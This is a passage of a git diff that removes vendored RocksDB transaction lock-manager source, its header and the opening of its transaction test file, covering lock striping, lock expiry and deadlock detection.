-        paths_buffer_.begin() + (paths_buffer_.size() - target_size));
-    buffer_idx_ = 0;
-  }
-  // Resize the buffer to the target size and restore the buffer's idx
-  else {
-    auto prev_size = paths_buffer_.size();
-    paths_buffer_.resize(target_size);
-    buffer_idx_ = (uint32_t)prev_size;
-  }
-}
-
-std::vector<DeadlockPath> DeadlockInfoBuffer::Normalize() {
-  auto working = paths_buffer_;
-
-  if (working.empty()) {
-    return working;
-  }
-
-  // Next write occurs at a nonexistent path's slot
-  if (paths_buffer_[buffer_idx_].empty()) {
-    working.resize(buffer_idx_);
-  } else {
-    std::rotate(working.begin(), working.begin() + buffer_idx_, working.end());
-  }
-
-  return working;
-}
-
-std::vector<DeadlockPath> DeadlockInfoBuffer::PrepareBuffer() {
-  std::lock_guard<std::mutex> lock(paths_buffer_mutex_);
-
-  // Reversing the normalized vector returns the latest deadlocks first
-  auto working = Normalize();
-  std::reverse(working.begin(), working.end());
-
-  return working;
-}
-
-namespace {
-void UnrefLockMapsCache(void* ptr) {
-  // Called when a thread exits or a ThreadLocalPtr gets destroyed.
-  auto lock_maps_cache =
-      static_cast<std::unordered_map<uint32_t, std::shared_ptr<LockMap>>*>(ptr);
-  delete lock_maps_cache;
-}
-}  // anonymous namespace
-
-TransactionLockMgr::TransactionLockMgr(
-    TransactionDB* txn_db, size_t default_num_stripes, int64_t max_num_locks,
-    uint32_t max_num_deadlocks,
-    std::shared_ptr<TransactionDBMutexFactory> mutex_factory)
-    : txn_db_impl_(nullptr),
-      default_num_stripes_(default_num_stripes),
-      max_num_locks_(max_num_locks),
-      lock_maps_cache_(new ThreadLocalPtr(&UnrefLockMapsCache)),
-      dlock_buffer_(max_num_deadlocks),
-      mutex_factory_(mutex_factory) {
-  assert(txn_db);
-  txn_db_impl_ =
-      static_cast_with_check<PessimisticTransactionDB, TransactionDB>(txn_db);
-}
-
-TransactionLockMgr::~TransactionLockMgr() {}
-
-size_t LockMap::GetStripe(const std::string& key) const {
-  assert(num_stripes_ > 0);
-  static murmur_hash hash;
-  size_t stripe = hash(key) % num_stripes_;
-  return stripe;
-}
-
-void TransactionLockMgr::AddColumnFamily(uint32_t column_family_id) {
-  InstrumentedMutexLock l(&lock_map_mutex_);
-
-  if (lock_maps_.find(column_family_id) == lock_maps_.end()) {
-    lock_maps_.emplace(column_family_id,
-                       std::shared_ptr<LockMap>(
-                           new LockMap(default_num_stripes_, mutex_factory_)));
-  } else {
-    // column_family already exists in lock map
-    assert(false);
-  }
-}
-
-void TransactionLockMgr::RemoveColumnFamily(uint32_t column_family_id) {
-  // Remove lock_map for this column family.  Since the lock map is stored
-  // as a shared ptr, concurrent transactions can still keep using it
-  // until they release their references to it.
-  {
-    InstrumentedMutexLock l(&lock_map_mutex_);
-
-    auto lock_maps_iter = lock_maps_.find(column_family_id);
-    assert(lock_maps_iter != lock_maps_.end());
-
-    lock_maps_.erase(lock_maps_iter);
-  }  // lock_map_mutex_
-
-  // Clear all thread-local caches
-  autovector<void*> local_caches;
-  lock_maps_cache_->Scrape(&local_caches, nullptr);
-  for (auto cache : local_caches) {
-    delete static_cast<LockMaps*>(cache);
-  }
-}
-
-// Look up the LockMap shared_ptr for a given column_family_id.
-// Note:  The LockMap is only valid as long as the caller is still holding on
-//   to the returned shared_ptr.
-std::shared_ptr<LockMap> TransactionLockMgr::GetLockMap(
-    uint32_t column_family_id) {
-  // First check thread-local cache
-  if (lock_maps_cache_->Get() == nullptr) {
-    lock_maps_cache_->Reset(new LockMaps());
-  }
-
-  auto lock_maps_cache = static_cast<LockMaps*>(lock_maps_cache_->Get());
-
-  auto lock_map_iter = lock_maps_cache->find(column_family_id);
-  if (lock_map_iter != lock_maps_cache->end()) {
-    // Found lock map for this column family.
-    return lock_map_iter->second;
-  }
-
-  // Not found in local cache, grab mutex and check shared LockMaps
-  InstrumentedMutexLock l(&lock_map_mutex_);
-
-  lock_map_iter = lock_maps_.find(column_family_id);
-  if (lock_map_iter == lock_maps_.end()) {
-    return std::shared_ptr<LockMap>(nullptr);
-  } else {
-    // Found lock map.  Store in thread-local cache and return.
-    std::shared_ptr<LockMap>& lock_map = lock_map_iter->second;
-    lock_maps_cache->insert({column_family_id, lock_map});
-
-    return lock_map;
-  }
-}
-
-// Returns true if this lock has expired and can be acquired by another
-// transaction.
-// If false, sets *expire_time to the expiration time of the lock according
-// to Env->GetMicros() or 0 if no expiration.
-bool TransactionLockMgr::IsLockExpired(TransactionID txn_id,
-                                       const LockInfo& lock_info, Env* env,
-                                       uint64_t* expire_time) {
-  auto now = env->NowMicros();
-
-  bool expired =
-      (lock_info.expiration_time > 0 && lock_info.expiration_time <= now);
-
-  if (!expired && lock_info.expiration_time > 0) {
-    // return how many microseconds until lock will be expired
-    *expire_time = lock_info.expiration_time;
-  } else {
-    for (auto id : lock_info.txn_ids) {
-      if (txn_id == id) {
-        continue;
-      }
-
-      bool success = txn_db_impl_->TryStealingExpiredTransactionLocks(id);
-      if (!success) {
-        expired = false;
-        break;
-      }
-      *expire_time = 0;
-    }
-  }
-
-  return expired;
-}
-
-Status TransactionLockMgr::TryLock(PessimisticTransaction* txn,
-                                   uint32_t column_family_id,
-                                   const std::string& key, Env* env,
-                                   bool exclusive) {
-  // Lookup lock map for this column family id
-  std::shared_ptr<LockMap> lock_map_ptr = GetLockMap(column_family_id);
-  LockMap* lock_map = lock_map_ptr.get();
-  if (lock_map == nullptr) {
-    char msg[255];
-    snprintf(msg, sizeof(msg), "Column family id not found: %" PRIu32,
-             column_family_id);
-
-    return Status::InvalidArgument(msg);
-  }
-
-  // Need to lock the mutex for the stripe that this key hashes to
-  size_t stripe_num = lock_map->GetStripe(key);
-  assert(lock_map->lock_map_stripes_.size() > stripe_num);
-  LockMapStripe* stripe = lock_map->lock_map_stripes_.at(stripe_num);
-
-  LockInfo lock_info(txn->GetID(), txn->GetExpirationTime(), exclusive);
-  int64_t timeout = txn->GetLockTimeout();
-
-  return AcquireWithTimeout(txn, lock_map, stripe, column_family_id, key, env,
-                            timeout, lock_info);
-}
-
-// Helper function for TryLock().
-Status TransactionLockMgr::AcquireWithTimeout(
-    PessimisticTransaction* txn, LockMap* lock_map, LockMapStripe* stripe,
-    uint32_t column_family_id, const std::string& key, Env* env,
-    int64_t timeout, const LockInfo& lock_info) {
-  Status result;
-  uint64_t start_time = 0;
-  uint64_t end_time = 0;
-
-  if (timeout > 0) {
-    start_time = env->NowMicros();
-    end_time = start_time + timeout;
-  }
-
-  if (timeout < 0) {
-    // If timeout is negative, we wait indefinitely to acquire the lock
-    result = stripe->stripe_mutex->Lock();
-  } else {
-    result = stripe->stripe_mutex->TryLockFor(timeout);
-  }
-
-  if (!result.ok()) {
-    // failed to acquire mutex
-    return result;
-  }
-
-  // Acquire lock if we are able to
-  uint64_t expire_time_hint = 0;
-  autovector<TransactionID> wait_ids;
-  result = AcquireLocked(lock_map, stripe, key, env, lock_info,
-                         &expire_time_hint, &wait_ids);
-
-  if (!result.ok() && timeout != 0) {
-    // If we weren't able to acquire the lock, we will keep retrying as long
-    // as the timeout allows.
-    bool timed_out = false;
-    do {
-      // Decide how long to wait
-      int64_t cv_end_time = -1;
-
-      // Check if held lock's expiration time is sooner than our timeout
-      if (expire_time_hint > 0 &&
-          (timeout < 0 || (timeout > 0 && expire_time_hint < end_time))) {
-        // expiration time is sooner than our timeout
-        cv_end_time = expire_time_hint;
-      } else if (timeout >= 0) {
-        cv_end_time = end_time;
-      }
-
-      assert(result.IsBusy() || wait_ids.size() != 0);
-
-      // We are dependent on a transaction to finish, so perform deadlock
-      // detection.
-      if (wait_ids.size() != 0) {
-        if (txn->IsDeadlockDetect()) {
-          if (IncrementWaiters(txn, wait_ids, key, column_family_id,
-                               lock_info.exclusive)) {
-            result = Status::Busy(Status::SubCode::kDeadlock);
-            stripe->stripe_mutex->UnLock();
-            return result;
-          }
-        }
-        txn->SetWaitingTxn(wait_ids, column_family_id, &key);
-      }
-
-      TEST_SYNC_POINT("TransactionLockMgr::AcquireWithTimeout:WaitingTxn");
-      if (cv_end_time < 0) {
-        // Wait indefinitely
-        result = stripe->stripe_cv->Wait(stripe->stripe_mutex);
-      } else {
-        uint64_t now = env->NowMicros();
-        if (static_cast<uint64_t>(cv_end_time) > now) {
-          result = stripe->stripe_cv->WaitFor(stripe->stripe_mutex,
-                                              cv_end_time - now);
-        }
-      }
-
-      if (wait_ids.size() != 0) {
-        txn->ClearWaitingTxn();
-        if (txn->IsDeadlockDetect()) {
-          DecrementWaiters(txn, wait_ids);
-        }
-      }
-
-      if (result.IsTimedOut()) {
-          timed_out = true;
-          // Even though we timed out, we will still make one more attempt to
-          // acquire lock below (it is possible the lock expired and we
-          // were never signaled).
-      }
-
-      if (result.ok() || result.IsTimedOut()) {
-        result = AcquireLocked(lock_map, stripe, key, env, lock_info,
-                               &expire_time_hint, &wait_ids);
-      }
-    } while (!result.ok() && !timed_out);
-  }
-
-  stripe->stripe_mutex->UnLock();
-
-  return result;
-}
-
-void TransactionLockMgr::DecrementWaiters(
-    const PessimisticTransaction* txn,
-    const autovector<TransactionID>& wait_ids) {
-  std::lock_guard<std::mutex> lock(wait_txn_map_mutex_);
-  DecrementWaitersImpl(txn, wait_ids);
-}
-
-void TransactionLockMgr::DecrementWaitersImpl(
-    const PessimisticTransaction* txn,
-    const autovector<TransactionID>& wait_ids) {
-  auto id = txn->GetID();
-  assert(wait_txn_map_.Contains(id));
-  wait_txn_map_.Delete(id);
-
-  for (auto wait_id : wait_ids) {
-    rev_wait_txn_map_.Get(wait_id)--;
-    if (rev_wait_txn_map_.Get(wait_id) == 0) {
-      rev_wait_txn_map_.Delete(wait_id);
-    }
-  }
-}
-
-bool TransactionLockMgr::IncrementWaiters(
-    const PessimisticTransaction* txn,
-    const autovector<TransactionID>& wait_ids, const std::string& key,
-    const uint32_t& cf_id, const bool& exclusive) {
-  auto id = txn->GetID();
-  std::vector<int> queue_parents(txn->GetDeadlockDetectDepth());
-  std::vector<TransactionID> queue_values(txn->GetDeadlockDetectDepth());
-  std::lock_guard<std::mutex> lock(wait_txn_map_mutex_);
-  assert(!wait_txn_map_.Contains(id));
-
-  wait_txn_map_.Insert(id, {wait_ids, cf_id, key, exclusive});
-
-  for (auto wait_id : wait_ids) {
-    if (rev_wait_txn_map_.Contains(wait_id)) {
-      rev_wait_txn_map_.Get(wait_id)++;
-    } else {
-      rev_wait_txn_map_.Insert(wait_id, 1);
-    }
-  }
-
-  // No deadlock if nobody is waiting on self.
-  if (!rev_wait_txn_map_.Contains(id)) {
-    return false;
-  }
-
-  const auto* next_ids = &wait_ids;
-  int parent = -1;
-  for (int tail = 0, head = 0; head < txn->GetDeadlockDetectDepth(); head++) {
-    int i = 0;
-    if (next_ids) {
-      for (; i < static_cast<int>(next_ids->size()) &&
-             tail + i < txn->GetDeadlockDetectDepth();
-           i++) {
-        queue_values[tail + i] = (*next_ids)[i];
-        queue_parents[tail + i] = parent;
-      }
-      tail += i;
-    }
-
-    // No more items in the list, meaning no deadlock.
-    if (tail == head) {
-      return false;
-    }
-
-    auto next = queue_values[head];
-    if (next == id) {
-      std::vector<DeadlockInfo> path;
-      while (head != -1) {
-        assert(wait_txn_map_.Contains(queue_values[head]));
-
-        auto extracted_info = wait_txn_map_.Get(queue_values[head]);
-        path.push_back({queue_values[head], extracted_info.m_cf_id,
-                        extracted_info.m_waiting_key,
-                        extracted_info.m_exclusive});
-        head = queue_parents[head];
-      }
-      std::reverse(path.begin(), path.end());
-      dlock_buffer_.AddNewPath(DeadlockPath(path));
-      DecrementWaitersImpl(txn, wait_ids);
-      return true;
-    } else if (!wait_txn_map_.Contains(next)) {
-      next_ids = nullptr;
-      continue;
-    } else {
-      parent = head;
-      next_ids = &(wait_txn_map_.Get(next).m_neighbors);
-    }
-  }
-
-  // Wait cycle too big, just assume deadlock.
-  dlock_buffer_.AddNewPath(DeadlockPath(true));
-  DecrementWaitersImpl(txn, wait_ids);
-  return true;
-}
-
-// Try to lock this key after we have acquired the mutex.
-// Sets *expire_time to the expiration time in microseconds
-//  or 0 if no expiration.
-// REQUIRED:  Stripe mutex must be held.
-Status TransactionLockMgr::AcquireLocked(LockMap* lock_map,
-                                         LockMapStripe* stripe,
-                                         const std::string& key, Env* env,
-                                         const LockInfo& txn_lock_info,
-                                         uint64_t* expire_time,
-                                         autovector<TransactionID>* txn_ids) {
-  assert(txn_lock_info.txn_ids.size() == 1);
-
-  Status result;
-  // Check if this key is already locked
-  if (stripe->keys.find(key) != stripe->keys.end()) {
-    // Lock already held
-    LockInfo& lock_info = stripe->keys.at(key);
-    assert(lock_info.txn_ids.size() == 1 || !lock_info.exclusive);
-
-    if (lock_info.exclusive || txn_lock_info.exclusive) {
-      if (lock_info.txn_ids.size() == 1 &&
-          lock_info.txn_ids[0] == txn_lock_info.txn_ids[0]) {
-        // The list contains one txn and we're it, so just take it.
-        lock_info.exclusive = txn_lock_info.exclusive;
-        lock_info.expiration_time = txn_lock_info.expiration_time;
-      } else {
-        // Check if it's expired. Skips over txn_lock_info.txn_ids[0] in case
-        // it's there for a shared lock with multiple holders which was not
-        // caught in the first case.
-        if (IsLockExpired(txn_lock_info.txn_ids[0], lock_info, env,
-                          expire_time)) {
-          // lock is expired, can steal it
-          lock_info.txn_ids = txn_lock_info.txn_ids;
-          lock_info.exclusive = txn_lock_info.exclusive;
-          lock_info.expiration_time = txn_lock_info.expiration_time;
-          // lock_cnt does not change
-        } else {
-          result = Status::TimedOut(Status::SubCode::kLockTimeout);
-          *txn_ids = lock_info.txn_ids;
-        }
-      }
-    } else {
-      // We are requesting shared access to a shared lock, so just grant it.
-      lock_info.txn_ids.push_back(txn_lock_info.txn_ids[0]);
-      // Using std::max means that expiration time never goes down even when
-      // a transaction is removed from the list. The correct solution would be
-      // to track expiry for every transaction, but this would also work for
-      // now.
-      lock_info.expiration_time =
-          std::max(lock_info.expiration_time, txn_lock_info.expiration_time);
-    }
-  } else {  // Lock not held.
-    // Check lock limit
-    if (max_num_locks_ > 0 &&
-        lock_map->lock_cnt.load(std::memory_order_acquire) >= max_num_locks_) {
-      result = Status::Busy(Status::SubCode::kLockLimit);
-    } else {
-      // acquire lock
-      stripe->keys.insert({key, txn_lock_info});
-
-      // Maintain lock count if there is a limit on the number of locks
-      if (max_num_locks_) {
-        lock_map->lock_cnt++;
-      }
-    }
-  }
-
-  return result;
-}
-
-void TransactionLockMgr::UnLockKey(const PessimisticTransaction* txn,
-                                   const std::string& key,
-                                   LockMapStripe* stripe, LockMap* lock_map,
-                                   Env* env) {
-  TransactionID txn_id = txn->GetID();
-
-  auto stripe_iter = stripe->keys.find(key);
-  if (stripe_iter != stripe->keys.end()) {
-    auto& txns = stripe_iter->second.txn_ids;
-    auto txn_it = std::find(txns.begin(), txns.end(), txn_id);
-    // Found the key we locked.  unlock it.
-    if (txn_it != txns.end()) {
-      if (txns.size() == 1) {
-        stripe->keys.erase(stripe_iter);
-      } else {
-        auto last_it = txns.end() - 1;
-        if (txn_it != last_it) {
-          *txn_it = *last_it;
-        }
-        txns.pop_back();
-      }
-
-      if (max_num_locks_ > 0) {
-        // Maintain lock count if there is a limit on the number of locks.
-        assert(lock_map->lock_cnt.load(std::memory_order_relaxed) > 0);
-        lock_map->lock_cnt--;
-      }
-    }
-  } else {
-    // This key is either not locked or locked by someone else.  This should
-    // only happen if the unlocking transaction has expired.
-    assert(txn->GetExpirationTime() > 0 &&
-           txn->GetExpirationTime() < env->NowMicros());
-  }
-}
-
-void TransactionLockMgr::UnLock(PessimisticTransaction* txn,
-                                uint32_t column_family_id,
-                                const std::string& key, Env* env) {
-  std::shared_ptr<LockMap> lock_map_ptr = GetLockMap(column_family_id);
-  LockMap* lock_map = lock_map_ptr.get();
-  if (lock_map == nullptr) {
-    // Column Family must have been dropped.
-    return;
-  }
-
-  // Lock the mutex for the stripe that this key hashes to
-  size_t stripe_num = lock_map->GetStripe(key);
-  assert(lock_map->lock_map_stripes_.size() > stripe_num);
-  LockMapStripe* stripe = lock_map->lock_map_stripes_.at(stripe_num);
-
-  stripe->stripe_mutex->Lock();
-  UnLockKey(txn, key, stripe, lock_map, env);
-  stripe->stripe_mutex->UnLock();
-
-  // Signal waiting threads to retry locking
-  stripe->stripe_cv->NotifyAll();
-}
-
-void TransactionLockMgr::UnLock(const PessimisticTransaction* txn,
-                                const TransactionKeyMap* key_map, Env* env) {
-  for (auto& key_map_iter : *key_map) {
-    uint32_t column_family_id = key_map_iter.first;
-    auto& keys = key_map_iter.second;
-
-    std::shared_ptr<LockMap> lock_map_ptr = GetLockMap(column_family_id);
-    LockMap* lock_map = lock_map_ptr.get();
-
-    if (lock_map == nullptr) {
-      // Column Family must have been dropped.
-      return;
-    }
-
-    // Bucket keys by lock_map_ stripe
-    std::unordered_map<size_t, std::vector<const std::string*>> keys_by_stripe(
-        std::max(keys.size(), lock_map->num_stripes_));
-
-    for (auto& key_iter : keys) {
-      const std::string& key = key_iter.first;
-
-      size_t stripe_num = lock_map->GetStripe(key);
-      keys_by_stripe[stripe_num].push_back(&key);
-    }
-
-    // For each stripe, grab the stripe mutex and unlock all keys in this stripe
-    for (auto& stripe_iter : keys_by_stripe) {
-      size_t stripe_num = stripe_iter.first;
-      auto& stripe_keys = stripe_iter.second;
-
-      assert(lock_map->lock_map_stripes_.size() > stripe_num);
-      LockMapStripe* stripe = lock_map->lock_map_stripes_.at(stripe_num);
-
-      stripe->stripe_mutex->Lock();
-
-      for (const std::string* key : stripe_keys) {
-        UnLockKey(txn, *key, stripe, lock_map, env);
-      }
-
-      stripe->stripe_mutex->UnLock();
-
-      // Signal waiting threads to retry locking
-      stripe->stripe_cv->NotifyAll();
-    }
-  }
-}
-
-TransactionLockMgr::LockStatusData TransactionLockMgr::GetLockStatusData() {
-  LockStatusData data;
-  // Lock order here is important. The correct order is lock_map_mutex_, then
-  // for every column family ID in ascending order lock every stripe in
-  // ascending order.
-  InstrumentedMutexLock l(&lock_map_mutex_);
-
-  std::vector<uint32_t> cf_ids;
-  for (const auto& map : lock_maps_) {
-    cf_ids.push_back(map.first);
-  }
-  std::sort(cf_ids.begin(), cf_ids.end());
-
-  for (auto i : cf_ids) {
-    const auto& stripes = lock_maps_[i]->lock_map_stripes_;
-    // Iterate and lock all stripes in ascending order.
-    for (const auto& j : stripes) {
-      j->stripe_mutex->Lock();
-      for (const auto& it : j->keys) {
-        struct KeyLockInfo info;
-        info.exclusive = it.second.exclusive;
-        info.key = it.first;
-        for (const auto& id : it.second.txn_ids) {
-          info.ids.push_back(id);
-        }
-        data.insert({i, info});
-      }
-    }
-  }
-
-  // Unlock everything. Unlocking order is not important.
-  for (auto i : cf_ids) {
-    const auto& stripes = lock_maps_[i]->lock_map_stripes_;
-    for (const auto& j : stripes) {
-      j->stripe_mutex->UnLock();
-    }
-  }
-
-  return data;
-}
-std::vector<DeadlockPath> TransactionLockMgr::GetDeadlockInfoBuffer() {
-  return dlock_buffer_.PrepareBuffer();
-}
-
-void TransactionLockMgr::Resize(uint32_t target_size) {
-  dlock_buffer_.Resize(target_size);
-}
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.h b/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.h
deleted file mode 100644
index abf7c5d..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_lock_mgr.h
+++ /dev/null
@@ -1,158 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <chrono>
-#include <string>
-#include <unordered_map>
-#include <utility>
-#include <vector>
-
-#include "monitoring/instrumented_mutex.h"
-#include "rocksdb/utilities/transaction.h"
-#include "util/autovector.h"
-#include "util/hash_map.h"
-#include "util/thread_local.h"
-#include "utilities/transactions/pessimistic_transaction.h"
-
-namespace rocksdb {
-
-class ColumnFamilyHandle;
-struct LockInfo;
-struct LockMap;
-struct LockMapStripe;
-
-struct DeadlockInfoBuffer {
- private:
-  std::vector<DeadlockPath> paths_buffer_;
-  uint32_t buffer_idx_;
-  std::mutex paths_buffer_mutex_;
-  std::vector<DeadlockPath> Normalize();
-
- public:
-  explicit DeadlockInfoBuffer(uint32_t n_latest_dlocks)
-      : paths_buffer_(n_latest_dlocks), buffer_idx_(0) {}
-  void AddNewPath(DeadlockPath path);
-  void Resize(uint32_t target_size);
-  std::vector<DeadlockPath> PrepareBuffer();
-};
-
-struct TrackedTrxInfo {
-  autovector<TransactionID> m_neighbors;
-  uint32_t m_cf_id;
-  std::string m_waiting_key;
-  bool m_exclusive;
-};
-
-class Slice;
-class PessimisticTransactionDB;
-
-class TransactionLockMgr {
- public:
-  TransactionLockMgr(TransactionDB* txn_db, size_t default_num_stripes,
-                     int64_t max_num_locks, uint32_t max_num_deadlocks,
-                     std::shared_ptr<TransactionDBMutexFactory> factory);
-
-  ~TransactionLockMgr();
-
-  // Creates a new LockMap for this column family.  Caller should guarantee
-  // that this column family does not already exist.
-  void AddColumnFamily(uint32_t column_family_id);
-
-  // Deletes the LockMap for this column family.  Caller should guarantee that
-  // this column family is no longer in use.
-  void RemoveColumnFamily(uint32_t column_family_id);
-
-  // Attempt to lock key.  If OK status is returned, the caller is responsible
-  // for calling UnLock() on this key.
-  Status TryLock(PessimisticTransaction* txn, uint32_t column_family_id,
-                 const std::string& key, Env* env, bool exclusive);
-
-  // Unlock a key locked by TryLock().  txn must be the same Transaction that
-  // locked this key.
-  void UnLock(const PessimisticTransaction* txn, const TransactionKeyMap* keys,
-              Env* env);
-  void UnLock(PessimisticTransaction* txn, uint32_t column_family_id,
-              const std::string& key, Env* env);
-
-  using LockStatusData = std::unordered_multimap<uint32_t, KeyLockInfo>;
-  LockStatusData GetLockStatusData();
-  std::vector<DeadlockPath> GetDeadlockInfoBuffer();
-  void Resize(uint32_t);
-
- private:
-  PessimisticTransactionDB* txn_db_impl_;
-
-  // Default number of lock map stripes per column family
-  const size_t default_num_stripes_;
-
-  // Limit on number of keys locked per column family
-  const int64_t max_num_locks_;
-
-  // The following lock order must be satisfied in order to avoid deadlocking
-  // ourselves.
-  //   - lock_map_mutex_
-  //   - stripe mutexes in ascending cf id, ascending stripe order
-  //   - wait_txn_map_mutex_
-  //
-  // Must be held when accessing/modifying lock_maps_.
-  InstrumentedMutex lock_map_mutex_;
-
-  // Map of ColumnFamilyId to locked key info
-  using LockMaps = std::unordered_map<uint32_t, std::shared_ptr<LockMap>>;
-  LockMaps lock_maps_;
-
-  // Thread-local cache of entries in lock_maps_.  This is an optimization
-  // to avoid acquiring a mutex in order to look up a LockMap
-  std::unique_ptr<ThreadLocalPtr> lock_maps_cache_;
-
-  // Must be held when modifying wait_txn_map_ and rev_wait_txn_map_.
-  std::mutex wait_txn_map_mutex_;
-
-  // Maps from waitee -> number of waiters.
-  HashMap<TransactionID, int> rev_wait_txn_map_;
-  // Maps from waiter -> waitee.
-  HashMap<TransactionID, TrackedTrxInfo> wait_txn_map_;
-  DeadlockInfoBuffer dlock_buffer_;
-
-  // Used to allocate mutexes/condvars to use when locking keys
-  std::shared_ptr<TransactionDBMutexFactory> mutex_factory_;
-
-  bool IsLockExpired(TransactionID txn_id, const LockInfo& lock_info, Env* env,
-                     uint64_t* wait_time);
-
-  std::shared_ptr<LockMap> GetLockMap(uint32_t column_family_id);
-
-  Status AcquireWithTimeout(PessimisticTransaction* txn, LockMap* lock_map,
-                            LockMapStripe* stripe, uint32_t column_family_id,
-                            const std::string& key, Env* env, int64_t timeout,
-                            const LockInfo& lock_info);
-
-  Status AcquireLocked(LockMap* lock_map, LockMapStripe* stripe,
-                       const std::string& key, Env* env,
-                       const LockInfo& lock_info, uint64_t* wait_time,
-                       autovector<TransactionID>* txn_ids);
-
-  void UnLockKey(const PessimisticTransaction* txn, const std::string& key,
-                 LockMapStripe* stripe, LockMap* lock_map, Env* env);
-
-  bool IncrementWaiters(const PessimisticTransaction* txn,
-                        const autovector<TransactionID>& wait_ids,
-                        const std::string& key, const uint32_t& cf_id,
-                        const bool& exclusive);
-  void DecrementWaiters(const PessimisticTransaction* txn,
-                        const autovector<TransactionID>& wait_ids);
-  void DecrementWaitersImpl(const PessimisticTransaction* txn,
-                            const autovector<TransactionID>& wait_ids);
-
-  // No copying allowed
-  TransactionLockMgr(const TransactionLockMgr&);
-  void operator=(const TransactionLockMgr&);
-};
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_test.cc b/thirdparty/rocksdb/utilities/transactions/transaction_test.cc
deleted file mode 100644
index eac8e56..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_test.cc
+++ /dev/null
@@ -1,4884 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <functional>
-#include <string>
-#include <thread>
-
-#include "db/db_impl.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "table/mock_table.h"
-#include "util/fault_injection_test_env.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "util/transaction_test_util.h"
-#include "utilities/merge_operators.h"
-#include "utilities/merge_operators/string_append/stringappend.h"
-#include "utilities/transactions/pessimistic_transaction_db.h"
-
-#include "port/port.h"
-
-using std::string;
-
-namespace rocksdb {
-
-class TransactionTest : public ::testing::TestWithParam<
-                            std::tuple<bool, bool, TxnDBWritePolicy>> {
- public:
-  TransactionDB* db;
-  FaultInjectionTestEnv* env;
-  string dbname;
-  Options options;
-
-  TransactionDBOptions txn_db_options;
-
-  TransactionTest() {
-    options.create_if_missing = true;
-    options.max_write_buffer_number = 2;
-    options.write_buffer_size = 4 * 1024;
-    options.level0_file_num_compaction_trigger = 2;
-    options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-    env = new FaultInjectionTestEnv(Env::Default());
-    options.env = env;
-    options.concurrent_prepare = std::get<1>(GetParam());
-    dbname = test::TmpDir() + "/transaction_testdb";
-
-    DestroyDB(dbname, options);
-    txn_db_options.transaction_lock_timeout = 0;
-    txn_db_options.default_lock_timeout = 0;
-    txn_db_options.write_policy = std::get<2>(GetParam());
-    Status s;
-    if (std::get<0>(GetParam()) == false) {
-      s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-    } else {
-      s = OpenWithStackableDB();
-    }
-    assert(s.ok());
-  }
-
-  ~TransactionTest() {
-    delete db;
-    DestroyDB(dbname, options);
-    delete env;
-  }
-
-  Status ReOpenNoDelete() {
-    delete db;
-    db = nullptr;
-    env->AssertNoOpenFile();
-    env->DropUnsyncedFileData();
-    env->ResetState();
-    Status s;
-    if (std::get<0>(GetParam()) == false) {
-      s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-    } else {
-      s = OpenWithStackableDB();
-    }
-    return s;
-  }
-
-  Status ReOpen() {
-    delete db;
-    DestroyDB(dbname, options);
-    Status s;
-    if (std::get<0>(GetParam()) == false) {
-      s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-    } else {
-      s = OpenWithStackableDB();
-    }
-    return s;
-  }
-
-  Status OpenWithStackableDB() {
-    std::vector<size_t> compaction_enabled_cf_indices;
-    std::vector<ColumnFamilyDescriptor> column_families{ColumnFamilyDescriptor(
-        kDefaultColumnFamilyName, ColumnFamilyOptions(options))};
-
-    TransactionDB::PrepareWrap(&options, &column_families,
-                               &compaction_enabled_cf_indices);
-    std::vector<ColumnFamilyHandle*> handles;
-    DB* root_db;
-    Options options_copy(options);
-    Status s =
-        DB::Open(options_copy, dbname, column_families, &handles, &root_db);
-    if (s.ok()) {
-      assert(handles.size() == 1);
-      s = TransactionDB::WrapStackableDB(
-          new StackableDB(root_db), txn_db_options,
-          compaction_enabled_cf_indices, handles, &db);
-      delete handles[0];
-    }
-    return s;
-  }
-};
-
-class MySQLStyleTransactionTest : public TransactionTest {};
-class WritePreparedTransactionTest : public TransactionTest {};
-
-static const TxnDBWritePolicy wc = WRITE_COMMITTED;
-static const TxnDBWritePolicy wp = WRITE_PREPARED;
-// TODO(myabandeh): Instantiate the tests with other write policies
-INSTANTIATE_TEST_CASE_P(DBAsBaseDB, TransactionTest,
-                        ::testing::Values(std::make_tuple(false, false, wc)));
-INSTANTIATE_TEST_CASE_P(StackableDBAsBaseDB, TransactionTest,
-                        ::testing::Values(std::make_tuple(true, false, wc)));
-INSTANTIATE_TEST_CASE_P(MySQLStyleTransactionTest, MySQLStyleTransactionTest,
-                        ::testing::Values(std::make_tuple(false, false, wc),
-                                          std::make_tuple(false, true, wc),
-                                          std::make_tuple(true, false, wc),
-                                          std::make_tuple(true, true, wc)));
-INSTANTIATE_TEST_CASE_P(WritePreparedTransactionTest,
-                        WritePreparedTransactionTest,
-                        ::testing::Values(std::make_tuple(false, true, wp)));
-
-TEST_P(TransactionTest, DoubleEmptyWrite) {
-  WriteOptions write_options;
-  write_options.sync = true;
-  write_options.disableWAL = false;
-
-  WriteBatch batch;
-
-  ASSERT_OK(db->Write(write_options, &batch));
-  ASSERT_OK(db->Write(write_options, &batch));
-}
-
